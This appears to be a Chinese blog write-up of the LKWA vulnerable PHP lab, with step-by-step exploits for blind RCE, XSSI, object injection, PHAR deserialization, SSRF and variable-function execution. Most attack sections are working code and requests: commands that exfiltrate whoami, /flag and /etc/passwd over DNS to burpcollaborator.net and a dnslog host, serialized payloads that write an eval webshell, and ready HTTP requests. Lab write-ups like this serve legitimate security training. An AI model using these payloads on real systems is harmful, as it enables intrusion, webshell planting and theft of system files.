LKWA靶机学习

1 下载地址

# 下载LKWA直接放在你的web服务器目录下即可运行

git clone https://github.com/weev3/LKWA

# docker安装

docker pull kminthein/lkwa:latest

docker run -ti -p 3000:80 kminthein/lkwa:latest

# 进入docker中安装ping工具

apt install iputils-ping

# 修改文件所属

chown -R www-data:www-data /var/www/html

  • 注意:

    • 对于XSSI实验,需要把apache2.conf中的Allow Override None改成Allow Override ALL。还可以将apache2.conf移动到/etc/apache2/

    • 对于PHAR Deserialization实验,需要把php.ini配置文件中的phar.readonly = On改成phar.readonly = Off

2 Blind RCE

由于盲打RCE不能回显数据,因此采用dns查询的方式把数据带出到dns服务器上。

2.1 利用Burpsuite Collaborato模块来查看输出。

  • 选择BP文件左上角Burp-->Burp Collaborator Client
  • 点击copy to clipboard复制payload,不要关闭当前窗口

  1. 在盲打RCE界面输入以下命令:

    ping `whoami`.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net
    • 其中:r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net为复制的payload内容
    • 在Burp Collaborator Client界面查看回显的内容:www-data.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net.

  2. 查看靶机系统根目录文件数量

    ls / | awk -F ' ' '{system("ping -c 2 "NR".r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net")}'
    • ping -c 2:是防止由于网络延时导致第一个ping包不可达,导致显示结果不正确
    • NR:已经读出的记录数,就是行号,从1开始
    • awk -F ' ' '{system("cmd")}':执行系统命令,以空格分隔
    • 在Burp Collaborator Client界面查看回显的内容:19.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net. 说明当前根目录共有19个文件

  3. 查看靶机系统根目录文件名称

    ls / | awk -F' ' 'NR==1{system("ping -c 1 "$0".r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net")}'
    • 使用Burp遍历NR==$1$
    • 在Burp Collaborator Client界面查看回显的内容:bin.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net.

  4. 查看flag文件内容:

    ping -c 1 `cat /flag`.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net
    
ping -c 1 `head -1 /etc/passwd`.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net

2.2 尝试利用dnslog进行回显

ping `whoami`.0bc423af.dns.1433.eu.org
  • 在DNS log界面查看回显的内容:www-data.0bc423af.dns.1433.eu.org.

3 XSSI

  1. 根据提示登录进去后,查看页面源码,发现存在../api/user

    <script>
    
     function get(){
    
     	$.ajax(
    
     	{
    
     	 url:"../api/user",
    
     	 type:"GET",
    
     	 async:true,
    
     	 success:function(parse){
    
     	  for (var i in parse){

     	      $("#" + i).text(parse[i]);

     	  }
    
     	 }
    
     	}
    
     	);
    
     }
    
     get();
    
</script>

  2. 补齐url,在当前登录的浏览器中访问http://192.168.50.4:3000/api/user

  3. 通过将构造好的1.php脚本放置在本地服务器目录下,以便随时拿数据

    <html>
    
  <head>
    
    <title>XSSI</title>
    
  </head>
    
<body>
    
    <script>
    
        function a(s)
    
        {
    
        alert(JSON.stringify(s));
    
        }
    
    </script>
    
    <script src="http://192.168.50.4:3000/api/user?callback=a"></script>
    
</body>
    
</html>

  4. 浏览器访问1.php脚本可拿到数据

4 Object Injection

单击提交按钮后,一些序列化数据将会添加到url中,根据该信息构造POC:

  1. 反序列化POC

    <?php
    
class Foo{
    
    function __construct($filename, $data) {
    
        $this->filename = $filename;
    
        $this->data = $data;
    
    }
    
    function __destruct(){
    
        file_put_contents($this->filename, $this->data);
    
    }
    
}

$a = new Foo("/var/www/html/test.php","<?php \${\${eval(\$_POST[acmd])}};phpinfo(); ?>");
    
echo serialize($a);
    
echo "\n";
    
echo urlencode(serialize($a));
    
echo "\n";
    
?>

  2. 生成如下内容:

    # php 1.php
    
O:3:"Foo":2:{s:8:"filename";s:22:"/var/www/html/test.php";s:4:"data";s:44:"<?php ${${eval($_POST[acmd])}};phpinfo(); ?>";}
    
O%3A3%3A%22Foo%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A22%3A%22%2Fvar%2Fwww%2Fhtml%2Ftest.php%22%3Bs%3A4%3A%22data%22%3Bs%3A44%3A%22%3C%3Fphp+%24%7B%24%7Beval%28%24_POST%5Bacmd%5D%29%7D%7D%3Bphpinfo%28%29%3B+%3F%3E%22%3B%7D

  3. 生成shell文件:

    http://192.168.50.4:3000/objectInjection/content.php?object=O%3A3%3A%22Foo%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A22%3A%22%2Fvar%2Fwww%2Fhtml%2Ftest.php%22%3Bs%3A4%3A%22data%22%3Bs%3A44%3A%22%3C%3Fphp+%24%7B%24%7Beval%28%24_POST%5Bacmd%5D%29%7D%7D%3Bphpinfo%28%29%3B+%3F%3E%22%3B%7D

  4. 查看上传的webshell文件

    # cat test.php
    
<?php ${${eval($_POST[acmd])}};phpinfo(); ?>

  5. 成功getshell:

5 Object Injection via cookies

与上一个实验原理一样,只是对象注入发生在cookie中。

  1. 反序列化POC

    <?php

/**
    
 * Object Injection via Cookie
    
 */
    
class Foo{
    
    public $cmd;
    
    function __construct() {
    
    }
    
    function __destruct(){
    
        eval($this->cmd);
    
    }
    
}

$a = new Foo();
    
$a->cmd = "phpinfo();";
    
echo serialize($a);
    
echo "\n";
    
echo urlencode(serialize($a));
    
echo "\n";
    
?>

  2. 生成如下POC:

    # php.exe 1.php | more
    
O:3:"Foo":1:{s:3:"cmd";s:10:"phpinfo();";}
    
O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D

  3. 利用POC执行命令:

    POST /objectInjection_cookie/content.php HTTP/1.1
    
Host: 192.168.50.4:3000
    
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
Accept-Encoding: gzip, deflate
    
Content-Type: application/x-www-form-urlencoded
    
Content-Length: 19
    
Origin: http://192.168.50.4:3000
    
Connection: close
    
Referer: http://192.168.50.4:3000/objectInjection_cookie/content.php
    
Cookie: PHPSESSID=scjeodjvci398so1j4j55htkp5; username=O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D
    
Upgrade-Insecure-Requests: 1
    
DNT: 1
    
Sec-GPC: 1

username=&password=

  4. 成功执行phpinfo()命令

6 Object Injection (Object Reference)

让猜数据,但是不可能猜出来的。

原代码:

<?php

// vuln code

if (isset($_POST['guess'])) {

  // code...

  $obj = unserialize($_POST['input']);

  if($obj) {

      $obj->guess = $_POST['guess'];

      $obj->secretCode = rand(500000,999999);

      if($obj->guess === $obj->secretCode) {

          echo "<p class='text-success'>You Win !!!!!</p>";

      }

      else{

      	echo "<p class='text-danger'>Loser!!!!</p>";

      }

  }

}

?>
  • 将输入的数字与随机生成的密码进行比较。若输入的数字与该密码匹配,则表明通过,否则失败。
  • 猜是不可能猜的,只能绕过

  1. 反序列化POC

    <?php
    
class Object1
    
{
    
  var $guess;
    
  var $secretCode;
    
}

$a = new Object1();
    
$a->guess =  &$a->secretCode;

echo serialize($a);
    
echo "\n";
    
echo urlencode(serialize($a));
    
echo "\n";
    
?>

  2. 生成如下POC:

    # php 1.php
    
O:7:"Object1":2:{s:5:"guess";N;s:10:"secretCode";R:2;}
    
O%3A7%3A%22Object1%22%3A2%3A%7Bs%3A5%3A%22guess%22%3BN%3Bs%3A10%3A%22secretCode%22%3BR%3A2%3B%7D

  3. 利用POC绕过比较:

    POST /objectref/objectref.php HTTP/1.1
    
Host: 192.168.50.4:3000
    
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
Accept-Encoding: gzip, deflate
    
Content-Type: application/x-www-form-urlencoded
    
Content-Length: 110
    
Origin: http://192.168.50.4:3000
    
Connection: close
    
Referer: http://192.168.50.4:3000/objectref/objectref.php
    
Cookie: PHPSESSID=scjeodjvci398so1j4j55htkp5; username=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3B%7D
    
Upgrade-Insecure-Requests: 1
    
DNT: 1
    
Sec-GPC: 1

guess=1&input=O%3A7%3A%22Object1%22%3A2%3A%7Bs%3A5%3A%22guess%22%3BN%3Bs%3A10%3A%22secretCode%22%3BR%3A2%3B%7D

  4. 成功绕过:

7 PHAR Deserialization

PHP phar:协议对象注入技术介绍 - FreeBuf网络安全行业门户

  1. PHAR POC:

    <?php
    
// create new Phar
    
@unlink("pharfile.phar");
    
$phar = new Phar('pharfile.phar');
    
$phar->startBuffering();
    
$phar->addFromString('test.txt', 'data');
    
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// add object of any class as meta data
    
class log
    
{
    
    function __wakeup(){
    
    }
    
}
    
$object = new log;
    
$object->filename = 'test.php';
    
$object->data = '<?php ${${eval($_POST[acmd])}};phpinfo(); ?>';
    
$phar->setMetadata($object);
    
$phar->stopBuffering();
    
?>

  2. 生成如下POC:

    # php 1.php
    
会在当前目录下生成一个pharfile.phar文件

  3. 上传pharfile.phar,并执行以下Payload触发pharfile.phar文件执行

    http://192.168.50.4:3000/phar_deserial/phar_deserial.php?file=phar://uploads/pharfile.phar

  4. 靶机上查看上传的Payload与生成的webshell文件

    # ls -la /var/www/html/phar_deserial/uploads/pharfile.phar
    
-rw-r--r--. 1 www-data www-data 226 Jul 24 13:08 /var/www/html/phar_deserial/uploads/pharfile.phar

# cat /var/www/html/phar_deserial/test.php
    
<?php ${${eval($_POST[acmd])}};phpinfo(); ?>r

  5. 使用webshell客户端远程连接上传的webshell

8 SSRF

在输入框中输入一个图片的URL,将会在页面中显示出来:

代码部分:

<?php

include("sidebar.php");

if (isset($_GET['image'])) {

	# code...

	echo file_get_contents($_GET['image'], true);

}

?>

由代码可知,还可以包含本地文件:

9 Variables variable

在输入框中输入一些值,然后就会var_dump输出你输入的值。

  1. 代码部分:

    <?php
    
if (isset($_GET['func']) && isset($_GET['input'])) {
    
	$var = $_GET['func'];
    
	${"var"}($_GET['input']);
    
}
    
?>
    • 如果以GET方式传入funcinput的值,则将func的值添加到$var变量中,然后会将$var变量添加到动态变量中。在该动态变量可控时,可以把var_dump换成passthru

  2. 成功执行命令:

LKWA靶机学习的更多相关文章

  1. Vulnhub-XXE靶机学习

    ------------恢复内容开始------------ 前两天在微信公众号上看见了这个XXE靶场,就想试一试,虽然网上关于这个的文章已经写了太多太多了,但还是要写出来划划水,233333333, ...

  2. DC-2靶机

    DC-2 靶机获取:http://www.five86.com/ 靶机IP:192.168.43.197(arp-scan l) 攻击机器IP:192.168.43.199 在hosts文件里添加:1 ...

  3. 21. 从一道CTF靶机来学习mysql-udf提权

    这次测试的靶机为 Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习 PHPMailer 跟 mymq ...

  4. Vulnhub DC-1靶机渗透学习

    前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 ...

  5. 脚本小子学习--vulnhub靶机DC8

    @ 目录 前言 一.环境搭建 二.目标和思路 三.实际操作 1.信息收集 2.getshell 总结 前言 通过一些靶机实战练习,学习使用现有的工具来成为脚本小子. 一.环境搭建 靶机:Linux虚拟 ...

  6. 《ODAY安全:软件漏洞分析技术》学习心得-----shellcode的一点小小的思考

    I will Make Impossible To I'm possible -----------LittleHann 看了2个多星期.终于把0DAY这本书给看完了,自己动手将书上的实验一个一个实现 ...

  7. Kali学习笔记31:目录遍历漏洞、文件包含漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 目录遍历漏洞: 应用程序如果有操作文件的功能,限制不严 ...

  8. Kali学习笔记30:身份认证与命令执行漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 实验环境: Kali机器:192.168.163.13 ...

  9. Kali学习笔记29:默认安装漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 默认安装漏洞: 早期Windows默认自动开启很多服务 ...

  10. Kali学习笔记26:OWASP_ZAP

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 OWASP_ZAP扫描器不同于之前介绍的Web扫描器: ...

随机推荐

  1. Java反射与安全问题

    1.Java反射机制 Java反射机制是指在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法:对于任意一个对象,都能够调用它的任意一个方法和属性:这种动态获取的信息以及动态调用对象的方法的 ...

  2. JavaEE Day02MySQL

    今日内容 数据库的基本概念 MySQL数据库软件 安装 卸载 配置 SQL语句 一.数据库的基本概念 1.数据库DataBase,简称DB 2.什么是数据库?         用于存储和管理数据的仓库 ...

  3. python3中的常见知识点3------reduce()函数

    python3中的常见知识点3--reduce()函数 python3导入reduce()函数 reduce()函数语法 reduce()举例 其他python3常用函数 参考链接 python3中不 ...

  4. python面向对象推导流程

    举例:猫狗大战 # 1.例如我们要编写一个猫狗对战小游戏 # 首先我们要定义一个猫,和一只狗 cat1 = { 'name': '小白猫', 'type': '宠物猫', 'attack_val': ...

  5. 纷繁复杂见真章,华为云产品需求管理利器CodeArts Req解读

    摘要:到底什么是需求?又该如何做好需求管理? 本文分享自华为云社区<纷繁复杂见真章,华为云产品需求管理利器 CodeArts Req 解读>,作者:华为云头条 . 2022 年 8 月,某 ...

  6. 一文了解 Dubbo 的代码架构

    整体设计 图例说明: 图中左边淡蓝背景的为服务消费方使用的接口,右边淡绿色背景的为服务提供方使用的接口,位于中轴线上的为双方都用到的接口. 图中从下至上分为十层,各层均为单向依赖,右边的黑色箭头代表层 ...

  7. Python报SyntaxError: Missing parentheses in call to ‘print’. Did you mean print()

    SyntaxError: Missing parentheses in call to 'print'. Did you mean print()原因:python2.X版本与python3.X版本输 ...

  8. [OpenCV实战]18 Opencv中的单应性矩阵Homography

    目录 1 介绍 1.1 什么是Homography 1.2 使用Homography进行图像对齐 1.3 Homography的应用-全景拼接 2 Homography的计算 3 总结 4 参考 &l ...

  9. Educational Codeforces Round 141 解题报告

    Educational Codeforces Round 141 解题报告 \(\text{By DaiRuiChen007}\) \(\text{Contest Link}\) A. Make it ...

  10. Python 常用库函数

    压缩 zlib: 兼容gzip的压缩 gzip: 对gzip文件的支持 bz2: 对bzip2压缩的支持 lzma: 使用LZMA算法的压缩 zipfile: 操作ZIP存档 tarfile: 读取t ...